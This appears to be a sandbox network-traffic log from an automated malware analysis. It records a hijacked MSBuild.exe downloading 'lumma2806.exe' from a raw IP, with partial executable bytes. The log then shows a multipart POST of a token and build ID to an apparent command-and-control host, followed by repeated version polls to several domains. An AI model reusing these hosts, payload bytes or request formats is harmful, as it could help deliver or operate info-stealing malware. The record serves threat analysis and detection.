Jul 2, 2024 00:05:53.120933056 CEST	328	IN	Data Raw: d7 3d 39 38 fb 74 69 c8 6f 2a 02 c7 f1 0e fc 8e 16 85 48 25 f6 b8 b8 7a 82 bd f7 0b dc cc 01 d7 50 bb 0f 5e 29 72 f4 fc 3b 6a ea b8 50 77 e1 b9 da 29 20 23 8f e0 53 c5 1a 8d 02 dc 84 e8 b5 ef c4 dd e6 3d d9 6a f1 f3 68 a0 24 b0 79 50 0d 9c 87 13 Data Ascii: =98tio*H%zP^)r;jPw) #S=jh$yPeb>TB>^fq (,)G\|mj$PCIoq/]II?Jb\}PO9'vb$]jE?pHa[mGIC_ }l>KRy%NjX 'H8N_
Jul 2, 2024 00:05:53.120951891 CEST	1236	IN	Data Raw: d5 a3 89 9f c1 fe dc 52 3d 87 e6 e3 6f 21 6c 50 de 58 7c 1a d1 d4 81 f2 cd 1a 5c 07 b5 8e d9 7c 92 6b 89 0f 3a 05 38 b2 49 0c e6 76 19 ad 33 1f 1b 99 94 07 84 40 57 b1 3e ed c1 39 f5 ce 52 80 09 b2 5c 93 22 82 6e f0 04 d6 90 ca e6 c5 40 e0 1f 61 Data Ascii: R=o!lPX\|\\|k:8Iv3@W>9R\"n@auWz_oKN95{\&dk=Al[[=<?j]("v@:^8!dj><XBCW(91&9~<'x[\sZ&8S]r
Jul 2, 2024 00:05:53.127877951 CEST	1236	IN	Data Raw: cc 83 fe 74 0e 90 24 2b d2 1d 58 1c 1a 47 7f f5 9a c0 f0 7e 60 40 3d 37 72 c5 d7 f8 94 67 ef 0a 06 5a 7e a0 22 ce 41 33 17 da aa 26 fe 44 62 8f a8 16 cb 9a 3e d2 a6 91 87 53 55 8f b2 09 3e d2 a8 2e 46 49 5f b9 be 82 21 3e 79 c7 92 06 fd 68 5d 60 Data Ascii: t$+XG~`@=7rgZ~"A3&Db>SU>.FI_!>yh]`5KwVP:[,E%0t[N_-P+}_nt#<6fP#\|=0i0/WxEIXF~$%#M(, C}&5;"R2tZ_'=Drc<Ht` K$cc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	60411	77.105.132.27	80	7080	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:56.135301113 CEST	175	OUT	GET /lumma2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0 Host: 77.105.132.27 Cache-Control: no-cache
Jul 2, 2024 00:05:57.185786009 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:52:30 GMT ETag: "81000-61c16c33a5f2a" Accept-Ranges: bytes Content-Length: 528384 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 dc 05 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x+++z+z+z+k\+k\+z++(+k\+Z_+Z_+Z_+Rich+PELf'@RtP@0@P<h@Pd.text.0 `.BsS@4 `.rdata4PD@@.data@.reloc@B
Jul 2, 2024 00:05:57.185798883 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 c8 fc 47 00 e8 94 3e 00 00 68 98 3d 42 00 e8 84 66 00 00 59 Data Ascii: G>h=BfYh=BxfYh=BlfYjjhhGG6Jh=BMfYVWjYhGJjVhG0aBNh=BfY_^GHGHHG`G=h=B
Jul 2, 2024 00:05:57.185854912 CEST	1236	IN	Data Raw: eb 0a b9 16 00 00 00 3b c1 0f 42 c1 89 44 24 10 8d 44 24 10 56 50 53 e8 3d ff ff ff 8b 4c 24 1c 8b f0 57 ff 74 24 1c 89 33 56 89 7b 10 89 4b 14 e8 74 6f 00 00 83 c4 14 c6 04 3e 00 5e 5f 5b c2 08 00 e8 12 22 00 00 cc cc 55 8b ec 6a ff 68 00 3a 42 Data Ascii: ;BD$D$VPS=L$Wt$3V{Kto>^_["Ujh:BdPSVWG3PEde]U+EC+=Hx}s++;v,u"P>\x#GUA1;CrF#u
Jul 2, 2024 00:05:57.185866117 CEST	1236	IN	Data Raw: c4 08 89 1e 8b 45 e0 8d 0c 83 89 4e 04 8d 0c bb 89 4e 08 8b 45 ec 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 ff 75 e8 ff 75 dc 8b 4d d8 e8 fd 20 00 00 6a 00 6a 00 e8 74 66 00 00 e8 4f 1d 00 00 e8 59 a2 00 00 cc cc cc cc cc cc cc Data Ascii: ENNEMdY_^[]uuM jjtfOYUW\|$ujS\$VwS?N(v(FArP#+w6QPWj,VF$F(FWt^[_]XG3D$T
Jul 2, 2024 00:05:57.185884953 CEST	1236	IN	Data Raw: 00 00 83 c4 58 c2 20 00 e8 c3 9d 00 00 cc cc cc cc 56 8b 74 24 08 8b 06 ff d0 e8 c6 32 00 00 6a 04 56 e8 61 53 00 00 83 c4 08 33 c0 5e c2 04 00 cc 83 ec 08 56 8b 74 24 10 57 8b 06 8b 40 04 8b 44 30 30 8b 78 04 8b cf 89 7c 24 0c 8b 07 ff 50 04 8d Data Ascii: X Vt$2jVaS3^Vt$W@D00x\|$PD$PFjB D$tPtjt$-(_^PSUVWjL$D$/=@G-Gu1WL$/9=@Gu(G@(G@GL$
Jul 2, 2024 00:05:57.185897112 CEST	1236	IN	Data Raw: 00 5f 8b c6 5e 5d 5b 83 c4 0c c3 e8 ad 13 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b 5c 24 08 0f 57 c0 57 8b f9 0f 11 07 c7 47 10 00 00 00 00 c7 47 14 00 00 00 00 81 fb ff ff ff 7f 0f 87 81 00 00 00 83 fb 0f 77 25 0f be 44 24 10 53 50 57 Data Ascii: _^][S\$WWGGw%D$SPW_GLf;_[=v;BD$D$VPWAL$OL$SQV7_e^_[T$WVWFxF@
Jul 2, 2024 00:05:57.186057091 CEST	1236	IN	Data Raw: 08 01 52 8d 44 24 08 c7 06 08 52 42 00 50 66 0f d6 02 e8 a0 57 00 00 83 c4 08 8b c6 5e 83 c4 08 c2 04 00 cc cc cc cc cc cc 56 8b 74 24 08 0f 57 c0 57 8b f9 8d 47 04 50 c7 07 08 52 42 00 66 0f d6 00 8d 46 04 50 e8 6c 57 00 00 c7 07 74 52 42 00 83 Data Ascii: RD$RBPfW^Vt$WWGPRBfFPlWtRBFNGOHSB_^G3D$T$ WD$$SUVXD$W8D$D$$ifAu+QRL$D$PSWL$$v)T$Ar
Jul 2, 2024 00:05:57.186069012 CEST	1236	IN	Data Raw: 44 f0 6a 01 8d 45 d4 50 e8 18 1d 00 00 83 c4 08 50 56 8d 4d c0 e8 8b fb ff ff 68 b8 eb 42 00 8d 45 c0 50 e8 3d 53 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 51 56 8b f1 83 3e 00 75 26 6a 00 8d 4c 24 08 e8 c7 21 00 00 83 3e 00 75 0d a1 28 ff 47 Data Ascii: DjEPPVMhBEP=SQV>u&jL$!>u(G@(GL$"^YVFSB~vyvDvRBD$tjVPD^D$VRBtjV/D^
Jul 2, 2024 00:05:57.186089993 CEST	1224	IN	Data Raw: cc f0 ff 41 04 c3 cc cc cc cc cc cc cc cc cc cc cc 83 ec 48 a1 00 ed 47 00 33 c4 89 44 24 44 8b 44 24 50 8b 4c 24 64 53 55 8b 6c 24 64 56 57 8b 7c 24 78 89 44 24 20 89 4c 24 10 85 ff 74 11 8a 01 3c 2b 74 04 3c 2d 75 07 bb 01 00 00 00 eb 02 33 db Data Ascii: AHG3D$DD$PL$dSUl$dVW\|$xD$ L$t<+t<-u3E%=uC;w<0uLxtXuE0pt$PD$PD$tPtjjWL$,\|$8D$$L$GD$$t$PPQRE0HL$
Jul 2, 2024 00:05:57.186100960 CEST	1236	IN	Data Raw: 48 20 83 39 00 74 1d 8b 50 30 8b 0a 85 c9 7e 14 49 89 0a 8b 48 20 8b 11 8d 42 01 89 01 88 1a 0f b6 c3 eb 0b 8b 10 0f b6 cb 51 8b c8 ff 52 0c 83 f8 ff 8b 44 24 18 75 05 c6 44 24 14 01 83 ee 01 75 b9 5b 8b 54 24 0c 8b 4c 24 10 5e 89 42 04 8b c2 89 Data Ascii: H 9tP0~IH BQRD$uD$u[T$L$^B$uhBD$PVI$hBD$P6IhTRBphTB`hTBpS\$UVWwo+t$;w2+G
Jul 2, 2024 00:05:57.186120033 CEST	652	IN	Data Raw: 51 52 8b ce e8 1c d9 ff ff 5f 8b c6 5e c2 04 00 cc cc cc cc cc 8b 51 08 0f 57 c0 56 8b 74 24 08 8b ca 57 0f 11 06 c7 46 10 00 00 00 00 8d 79 01 c7 46 14 00 00 00 00 8a 01 41 84 c0 75 f9 2b cf 51 52 8b ce e8 dc d8 ff ff 5f 8b c6 5e c2 04 00 cc cc Data Ascii: QR_^QWVt$WFyFAu+QR_^D$T$L$+QRt$HD$LG3D$HSVt$dW\|$\D$%F tD$+Ul$L$E]t#Aluotd
Jul 2, 2024 00:05:57.186436892 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:52:30 GMT ETag: "81000-61c16c33a5f2a" Accept-Ranges: bytes Content-Length: 528384 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 dc 05 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x+++z+z+z+k\+k\+z++(+k\+Z_+Z_+Z_+Rich+PELf'@RtP@0@P<h@Pd.text.0 `.BsS@4 `.rdata4PD@@.data@.reloc@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	60429	207.180.253.128	80	7080	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:06.243329048 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0 Host: tea.arpdabl.org Content-Length: 3493 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 00:06:06.243356943 CEST	3493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 35 36 36 65 Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"76566ec154266cb5b97a24dff3da9e54------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="build_id"4e7fbe36a69903b4dfa6c1b767f4bf81------DHIJDHIDBGHJKE
Jul 2, 2024 00:06:06.928030014 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:06:06 GMT Server: Apache Last-Modified: Fri, 17 Apr 2020 21:22:04 GMT ETag: "f09-5a383241170a9" Accept-Ranges: bytes Content-Length: 3849 X-Powered-By: PleskLin Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 73 69 64 2d 70 6c 65 73 6b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 20 53 65 72 76 65 72 27 73 20 44 65 66 61 75 6c 74 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 31 39 39 39 2d 32 30 31 38 2e 20 50 6c 65 73 6b 20 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 20 47 6d 62 48 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" class="sid-plesk"><head> <title>Web Server's Default Page</title> <meta name="copyright" content="Copyright 1999-2018. Plesk International GmbH. All rights reserved."> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <meta http-equiv="Cache-Control" content="no-cache"> <link rel="shortcut icon" href="favicon.ico"> <link rel="stylesheet" href="css/style.css"> <script src="https://assets.plesk.com/static/default-website-content/public/default-server-index.js"></script></head><body><div class="page-container"> ... start: PAGE HEADER--> <div class="page-header-wrapper"> <div class="page-header"> <a class="product-logo" href="https://www.plesk.com" target="_blank"><img src="img/logo.png" alt="Plesk"
Jul 2, 2024 00:06:06.928055048 CEST	1236	IN	Data Raw: 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 21 2d 2d 20 65 6e 64 3a 20 50 41 47 45 20 48 45 41 44 45 52 2d 2d 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 73 74 61 72 74 3a 20 50 41 47 45 Data Ascii: ></a> </div> </div> ... end: PAGE HEADER--> ... start: PAGE CONTENT--> <div class="page-content-wrapper"> <div class="page-content"> <div class="page-info-wrapper"> <div class="pa
Jul 2, 2024 00:06:06.928075075 CEST	1236	IN	Data Raw: 6d 65 6e 74 20 74 6f 6f 6c 73 2e 20 49 74 20 77 61 73 20 73 70 65 63 69 61 6c 6c 79 20 64 65 73 69 67 6e 65 64 20 74 6f 20 68 65 6c 70 20 49 54 20 73 70 65 63 69 61 6c 69 73 74 73 20 6d 61 6e 61 67 65 20 77 65 62 2c 20 44 4e 53 2c 20 6d 61 69 6c Data Ascii: ment tools. It was specially designed to help IT specialists manage web, DNS, mail and other services through a comprehensive and user-friendly GUI. <a class="more" href="https://www.plesk.com" target="_blank">Learn more about Plesk</a>.</p>
Jul 2, 2024 00:06:06.928088903 CEST	435	IN	Data Raw: 64 3a 20 50 41 47 45 20 43 4f 4e 54 45 4e 54 2d 2d 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 73 74 61 72 74 3a 20 50 41 47 45 20 46 4f 4f 54 45 52 2d 2d 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 66 6f 6f 74 65 72 2d 77 72 61 Data Ascii: d: PAGE CONTENT--> ... start: PAGE FOOTER--> <div class="page-footer-wrapper"> <div class="page-footer"> This page was generated by Plesk. Plesk is the leading WebOps platform to run, automate and grow application

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.6	60432	185.22.66.16	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:06.895045996 CEST	380	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?BAxskCrAzBkAQLhyBAyQiyrSwfaJVtVcO HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Jul 2, 2024 00:06:07.706418037 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:07 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=e8ece0a0e90e75d863fdb615384c4a62; Path=/; Secure; HttpOnly Last-Modified: Fri, 21 Jun 2024 06:56:58 GMT ETag: "6675243a-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.6	60434	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:07.804497957 CEST	372	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?BaGHTJrEOqpSoOUUbPmVVgUlkCFxoVbnT HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Jul 2, 2024 00:06:08.524950027 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:07 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 07:08:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "667526e3-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	60436	13.225.78.36	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:08.647981882 CEST	384	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?PFusrYpNtPDdGjvKoKGcbouLSvYzMzgzu HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
Jul 2, 2024 00:06:09.285258055 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 21 Jun 2024 07:08:24 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Mon, 01 Jul 2024 07:30:02 GMT ETag: "91dd258251410a39475f0c79d75771d2" X-Cache: Hit from cloudfront Via: 1.1 217b7bc19321a4945b685521fa4f11ac.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: KeLDjDVAfrD-SKcyfmJ3IUfcSVozSEFAfVc9t_RSczoO8Kq_AEy1ww== Age: 52568
Jul 2, 2024 00:06:09.414844036 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	60445	185.22.66.16	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:27.221596003 CEST	382	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?lkNOHJiXnxKRAffVlKrZwoIEmkviEhCxR HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Jul 2, 2024 00:06:28.073741913 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:27 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=3c8f624f98243f5351dd336e2290e2c3; Path=/; Secure; HttpOnly Last-Modified: Fri, 21 Jun 2024 06:29:18 GMT ETag: "66751dbe-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	60447	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:28.092825890 CEST	374	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?ZOmFPgPUTVZNbWpVqvSvPLQtsthTrEhbx HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Jul 2, 2024 00:06:28.791659117 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:28 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 06:57:05 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66752441-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	60448	13.225.78.36	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:28.884813070 CEST	386	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?FJSFGEosnJwNZSTgJVMlBADdAGOvxPznz HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
Jul 2, 2024 00:06:29.521039009 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 21 Jun 2024 07:08:23 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Mon, 01 Jul 2024 07:29:11 GMT ETag: "91dd258251410a39475f0c79d75771d2" X-Cache: Hit from cloudfront Via: 1.1 edfd22ec6695cdc9d7ac634220af1314.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: dY6AVC8UIsGd9Nw1J7EpmYsbTf2SngALcH-IO50R62rXixWuR9JXOA== Age: 52639
Jul 2, 2024 00:06:29.652700901 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	60450	185.22.66.16	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:29.570590973 CEST	380	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?lfKppfDaSKtbiZoZrqLvfigDaXuNMaIUn HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Jul 2, 2024 00:06:30.342334032 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 22:06:30 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=edcb28b42d85b7b34f0a25708647e4c0; Path=/; Secure; HttpOnly Last-Modified: Fri, 21 Jun 2024 06:56:58 GMT ETag: "6675243a-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.6	60451	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:30.413705111 CEST	372	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?BsbCNQNrlQruMiRbNuFhJgcZknRTSMCKj HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Jul 2, 2024 00:06:31.144382954 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:06:30 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 21 Jun 2024 07:08:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "667526e3-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 38 37 Data Ascii: 2.0.0.3187

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.6	60452	13.225.78.36	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:06:31.196230888 CEST	384	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?nWWigaXNQYYJICpsdMZSxscisfoqitXJL HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
